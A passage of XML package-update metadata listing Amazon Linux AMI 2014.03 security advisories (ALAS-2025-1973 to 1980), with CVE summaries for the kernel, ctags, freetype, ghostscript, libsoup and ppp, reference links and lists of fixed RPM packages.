release="2.92.amzn1" epoch="0" arch="i686"><filename>Packages/python26-debuginfo-2.6.9-2.92.amzn1.i686.rpm</filename></package><package name="python26-devel" version="2.6.9" release="2.92.amzn1" epoch="0" arch="i686"><filename>Packages/python26-devel-2.6.9-2.92.amzn1.i686.rpm</filename></package><package name="python26-tools" version="2.6.9" release="2.92.amzn1" epoch="0" arch="i686"><filename>Packages/python26-tools-2.6.9-2.92.amzn1.i686.rpm</filename></package><package name="python26-libs" version="2.6.9" release="2.92.amzn1" epoch="0" arch="i686"><filename>Packages/python26-libs-2.6.9-2.92.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1973</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1973: important priority package update for kernel</title><issued date="2025-04-23 22:12:00" /><updated date="2025-05-21 21:01:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2025-21991:
In the Linux kernel, the following vulnerability has been resolved:
x86/microcode/AMD: Fix out-of-bounds on systems with CPU-less NUMA nodes
CVE-2025-21858:
In the Linux kernel, the following vulnerability has been resolved:
geneve: Fix use-after-free in geneve_find_dev().
CVE-2025-21796:
In the Linux kernel, the following vulnerability has been resolved:
nfsd: clear acl_access/acl_default after releasing them
CVE-2025-21791:
In the Linux kernel, the following vulnerability has been resolved:
vrf: use RCU protection in l3mdev_l3_out()
CVE-2025-21759:
In the Linux kernel, the following vulnerability has been resolved:
ipv6: mcast: extend RCU protection in igmp6_send()
CVE-2024-50301:
In the Linux kernel, the following vulnerability has been resolved:
security/keys: fix slab-out-of-bounds in key_task_permission
CVE-2024-50278:
In the Linux kernel, the following vulnerability has been resolved:
dm cache: fix potential out-of-bounds access on the first resume
CVE-2024-50036:
In the Linux kernel, the following vulnerability has been resolved:
net: do not delay dst_entries_add() in dst_release()
CVE-2024-49882:
In the Linux kernel, the following vulnerability has been resolved:
ext4: fix double brelse() the buffer of the extents path
CVE-2024-47745:
In the Linux kernel, the following vulnerability has been resolved:
mm: call the security_mmap_file() LSM hook in remap_file_pages()
CVE-2023-52975:
In the Linux kernel, the following vulnerability has been resolved:
scsi: iscsi_tcp: Fix UAF during logout when accessing the shost ipaddress
CVE-2023-39189:
nftables out-of-bounds read in nf_osf_match_one()
CVE-2023-1611:
A use-after-free flaw was found in btrfs_search_slot in fs/btrfs/ctree.c in btrfs in the Linux Kernel.This flaw allows an attacker to crash the system and possibly cause a kernel information lea
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1611" title="" id="CVE-2023-1611" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39189" title="" id="CVE-2023-39189" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-52975" title="" id="CVE-2023-52975" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47745" title="" id="CVE-2024-47745" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-49882" title="" id="CVE-2024-49882" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50036" title="" id="CVE-2024-50036" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50278" title="" id="CVE-2024-50278" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50301" title="" id="CVE-2024-50301" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21759" title="" id="CVE-2025-21759" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21791" title="" id="CVE-2025-21791" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21796" title="" id="CVE-2025-21796" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21858" title="" id="CVE-2025-21858" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21991" title="" id="CVE-2025-21991" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf-debuginfo" version="4.14.355" release="196.639.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.355-196.639.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.355" release="196.639.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.355-196.639.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.355" release="196.639.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.355-196.639.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.355" release="196.639.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.355-196.639.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.355" release="196.639.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.355-196.639.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.355" release="196.639.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.355-196.639.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.355" release="196.639.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.355-196.639.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.355" release="196.639.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.355-196.639.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.355" release="196.639.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.355-196.639.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.355" release="196.639.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.355-196.639.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.355" release="196.639.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.355-196.639.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.355" release="196.639.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.355-196.639.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.355" release="196.639.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.355-196.639.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.355" release="196.639.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.355-196.639.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.355" release="196.639.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.355-196.639.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.355" release="196.639.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.355-196.639.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.355" release="196.639.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.355-196.639.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.355" release="196.639.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.355-196.639.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.355" release="196.639.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.355-196.639.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.355" release="196.639.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.355-196.639.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1974</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1974: important priority package update for ctags</title><issued date="2025-04-23 22:12:00" /><updated date="2025-04-29 21:10:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-4515:
A flaw was found in Exuberant Ctags in the way it handles the "-o" option. This option specifies the tag filename. A crafted tag filename specified in the command line or in the configuration file results in arbitrary command execution because the externalSortTags() in sort.c calls the system(3) function in an unsafe way.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4515" title="" id="CVE-2022-4515" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ctags-etags" version="5.8" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctags-etags-5.8-2.7.amzn1.x86_64.rpm</filename></package><package name="ctags" version="5.8" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctags-5.8-2.7.amzn1.x86_64.rpm</filename></package><package name="ctags-debuginfo" version="5.8" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctags-debuginfo-5.8-2.7.amzn1.x86_64.rpm</filename></package><package name="ctags-etags" version="5.8" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/ctags-etags-5.8-2.7.amzn1.i686.rpm</filename></package><package name="ctags-debuginfo" version="5.8" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/ctags-debuginfo-5.8-2.7.amzn1.i686.rpm</filename></package><package name="ctags" version="5.8" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/ctags-5.8-2.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1975</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1975: important priority package update for kernel</title><issued date="2025-04-23 22:37:00" /><updated date="2025-05-21 21:01:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-52973:
In the Linux kernel, the following vulnerability has been resolved:
vc_screen: move load of struct vc_data pointer in vcs_read() to avoid UAF
CVE-2023-52845:
In the Linux kernel, the following vulnerability has been resolved:
tipc: Change nla_policy for bearer-related names to NLA_NUL_STRING
CVE-2023-3567:
A use-after-free flaw was found in vcs_read in drivers/tty/vt/vc_screen.c in vc_screen in the Linux Kernel. In this flaw an attacker with local user access may lead to a system crash or a leak of internal kernel information.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3567" title="" id="CVE-2023-3567" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-52845" title="" id="CVE-2023-52845" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-52973" title="" id="CVE-2023-52973" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-devel" version="4.14.330" release="176.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.330" release="176.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.330" release="176.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.330" release="176.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.330" release="176.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.330" release="176.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.330" release="176.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.330" release="176.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.330" release="176.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.330" release="176.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.330" release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.330-176.540.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.330" release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.330-176.540.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.330" release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.330-176.540.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.330" release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.330-176.540.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.330" release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.330-176.540.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.330" release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.330-176.540.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.330" release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.330-176.540.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.330" release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.330-176.540.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.330" release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.330-176.540.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.330" release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.330-176.540.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1976</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1976: important priority package update for freetype</title><issued date="2025-05-08 22:24:00" /><updated date="2025-05-12 13:41:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2025-27363:
An out of bounds write exists in FreeType versions 2.13.0 and below when attempting to parse font subglyph structures related to TrueType GX and variable font files. The vulnerable code assigns a signed short value to an unsigned long and then adds a static value causing it to wrap around and allocate too small of a heap buffer. The code then writes up to 6 signed long integers out of bounds relative to this buffer. This may result in arbitrary code execution. This vulnerability may have been exploited in the wild.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27363" title="" id="CVE-2025-27363" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="freetype-demos" version="2.3.11" release="19.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-demos-2.3.11-19.17.amzn1.x86_64.rpm</filename></package><package name="freetype-debuginfo" version="2.3.11" release="19.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-debuginfo-2.3.11-19.17.amzn1.x86_64.rpm</filename></package><package name="freetype-devel" version="2.3.11" release="19.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-devel-2.3.11-19.17.amzn1.x86_64.rpm</filename></package><package name="freetype" version="2.3.11" release="19.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-2.3.11-19.17.amzn1.x86_64.rpm</filename></package><package name="freetype-debuginfo" version="2.3.11" release="19.17.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-debuginfo-2.3.11-19.17.amzn1.i686.rpm</filename></package><package name="freetype-devel" version="2.3.11" release="19.17.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-devel-2.3.11-19.17.amzn1.i686.rpm</filename></package><package name="freetype-demos" version="2.3.11" release="19.17.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-demos-2.3.11-19.17.amzn1.i686.rpm</filename></package><package name="freetype" version="2.3.11" release="19.17.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-2.3.11-19.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1977</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1977: important priority package update for kernel</title><issued date="2025-05-08 22:29:00" /><updated date="2025-05-12 13:41:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2025-21920:
In the Linux kernel, the following vulnerability has been resolved:
vlan: enforce underlying device type
CVE-2022-49465:
In the Linux kernel, the following vulnerability has been resolved:
blk-throttle: Set BIO_THROTTLED when bio has been throttled
CVE-2022-49413:
In the Linux kernel, the following vulnerability has been resolved:
bfq: Update cgroup information before merging bio
CVE-2022-49168:
In the Linux kernel, the following vulnerability has been resolved:
btrfs: do not clean up repair bio if submit fails
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-49168" title="" id="CVE-2022-49168" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-49413" title="" id="CVE-2022-49413" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-49465" title="" id="CVE-2022-49465" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21920" title="" id="CVE-2025-21920" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="4.14.355" release="196.643.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.355-196.643.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.355" release="196.643.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.355-196.643.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.355" release="196.643.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.355-196.643.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.355" release="196.643.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.355-196.643.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.355" release="196.643.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.355-196.643.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.355" release="196.643.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.355-196.643.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.355" release="196.643.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.355-196.643.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.355" release="196.643.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.355-196.643.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.355" release="196.643.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.355-196.643.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.355" release="196.643.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.355-196.643.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.355" release="196.643.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.355-196.643.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.355" release="196.643.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.355-196.643.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.355" release="196.643.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.355-196.643.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.355" release="196.643.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.355-196.643.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.355" release="196.643.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.355-196.643.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.355" release="196.643.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.355-196.643.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.355" release="196.643.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.355-196.643.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.355" release="196.643.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.355-196.643.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.355" release="196.643.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.355-196.643.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.355" release="196.643.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.355-196.643.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1978</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1978: important priority package update for ghostscript</title><issued date="2025-05-08 22:29:00" /><updated date="2025-05-12 13:41:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-46956:
PostScript interpreter - fix buffer length check
NOTE: https://bugs.ghostscript.com/show_bug.cgi?id=707895
NOTE: https://cgit.ghostscript.com/cgi-bin/cgit.cgi/ghostpdl.git/commit/?id=f4151f12db32cd3ed26c24327de714bf2c3ed6ca
NOTE: https://cgit.ghostscript.com/cgi-bin/cgit.cgi/ghostpdl.git/commit/?id=ea69a1388245ad959d31c272b5ba66d40cebba2c (ghostpdl-10.04.0)
CVE-2024-46953:
Check for overflow validating format string
NOTE: https://bugs.ghostscript.com/show_bug.cgi?id=707793
NOTE: https://cgit.ghostscript.com/cgi-bin/cgit.cgi/ghostpdl.git/commit/?id=1f21a45df0fa3abec4cff12951022b192dda3c00
NOTE: https://cgit.ghostscript.com/cgi-bin/cgit.cgi/ghostpdl.git/commit/?id=294a3755e33f453dd92e2a7c4cfceb087ac09d6a (ghostpdl-10.04.0)
CVE-2024-46951:
PS interpreter - check the type of the Pattern Implementation
NOTE: https://bugs.ghostscript.com/show_bug.cgi?id=707991
NOTE: https://cgit.ghostscript.com/cgi-bin/cgit.cgi/ghostpdl.git/commit/?id=f49812186baa7d1362880673408a6fbe8719b4f8
NOTE: https://cgit.ghostscript.com/cgi-bin/cgit.cgi/ghostpdl.git/commit/?id=ada21374f0c90cc3acf7ce0e96302394560c7aee (ghostpdl-10.04.0)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-46951" title="" id="CVE-2024-46951" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-46953" title="" id="CVE-2024-46953" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-46956" title="" id="CVE-2024-46956" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ghostscript-devel" version="8.70" release="24.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-devel-8.70-24.35.amzn1.x86_64.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="24.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-doc-8.70-24.35.amzn1.x86_64.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="24.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-debuginfo-8.70-24.35.amzn1.x86_64.rpm</filename></package><package name="ghostscript" version="8.70" release="24.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-8.70-24.35.amzn1.x86_64.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="24.35.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-debuginfo-8.70-24.35.amzn1.i686.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="24.35.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-devel-8.70-24.35.amzn1.i686.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="24.35.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-doc-8.70-24.35.amzn1.i686.rpm</filename></package><package name="ghostscript" version="8.70" release="24.35.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-8.70-24.35.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1979</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1979: important priority package update for libsoup</title><issued date="2025-05-21 21:01:00" /><updated date="2025-05-27 12:41:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2025-32914:
A flaw was found in libsoup, where the soup_multipart_new_from_message() function is vulnerable to an out-of-bounds read. This flaw allows a malicious HTTP client to induce the libsoup server to read out of bounds.
CVE-2025-32913:
A flaw was found in libsoup, where the soup_message_headers_get_content_disposition() function is vulnerable to a NULL pointer dereference. This flaw allows a malicious HTTP peer to crash a libsoup client or server that uses this function.
CVE-2025-32911:
libsoup: Double free on soup_message_headers_get_content_disposition() through "soup-message-headers.c" via "params" GHashTable value
CVE-2025-32907:
A flaw was found in libsoup. The implementation of HTTP range requests is vulnerable to a resource consumption attack. This flaw allows a malicious client to request the same range many times in a single HTTP request, causing the server to use large amounts of memory.
CVE-2025-32906:
A flaw was found in libsoup, where the soup_headers_parse_request() function may be vulnerable to an out-of-bound read. This flaw allows a malicious user to use a specially crafted HTTP request to crash the HTTP server.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-32906" title="" id="CVE-2025-32906" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-32907" title="" id="CVE-2025-32907" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-32911" title="" id="CVE-2025-32911" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-32913" title="" id="CVE-2025-32913" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-32914" title="" id="CVE-2025-32914" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libsoup-devel" version="2.28.2" release="5.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsoup-devel-2.28.2-5.9.amzn1.x86_64.rpm</filename></package><package name="libsoup-debuginfo" version="2.28.2" release="5.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsoup-debuginfo-2.28.2-5.9.amzn1.x86_64.rpm</filename></package><package name="libsoup" version="2.28.2" release="5.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsoup-2.28.2-5.9.amzn1.x86_64.rpm</filename></package><package name="libsoup-devel" version="2.28.2" release="5.9.amzn1" epoch="0" arch="i686"><filename>Packages/libsoup-devel-2.28.2-5.9.amzn1.i686.rpm</filename></package><package name="libsoup" version="2.28.2" release="5.9.amzn1" epoch="0" arch="i686"><filename>Packages/libsoup-2.28.2-5.9.amzn1.i686.rpm</filename></package><package name="libsoup-debuginfo" version="2.28.2" release="5.9.amzn1" epoch="0" arch="i686"><filename>Packages/libsoup-debuginfo-2.28.2-5.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1980</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1980: important priority package update for ppp</title><issued date="2025-05-21 21:01:00" /><updated date="2025-05-27 12:41:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-58250:
The passprompt plugin in pppd in ppp before 2.5.2 mishandles privileges.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58250" title="" id="CVE-2024-58250" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ppp-debuginfo" version="2.4.5" release="11.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/ppp-debuginfo-2.4.5-11.10.amzn1.x86_64.rpm</filename></package><package name="ppp" version="2.4.5" release="11.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/ppp-2.4.5-11.10.amzn1.x86_64.rpm</filename></package><package name="ppp-devel" version="2.4.5" release="11.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/ppp-devel-2.4.5-11.10.amzn1.x86_64.rpm</filename></package><package name="ppp-debuginfo" version="2.4.5" release="11.10.amzn1" epoch="0" arch="i686"><filename>Packages/ppp-debuginfo-2.4.5-11.10.amzn1.i686.rpm</filename></package><package name="ppp" version="2.4.5" release="11.10.amzn1" epoch="0" arch="i686"><filename>Packages/ppp-2.4.5-11.10.amzn1.i686.rpm</filename></package><package name="ppp-devel" version="2.4.5" release="11.10.amzn1" epoch="0" arch="i686"><filename>Packages/ppp-devel-2.4.5-11.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" 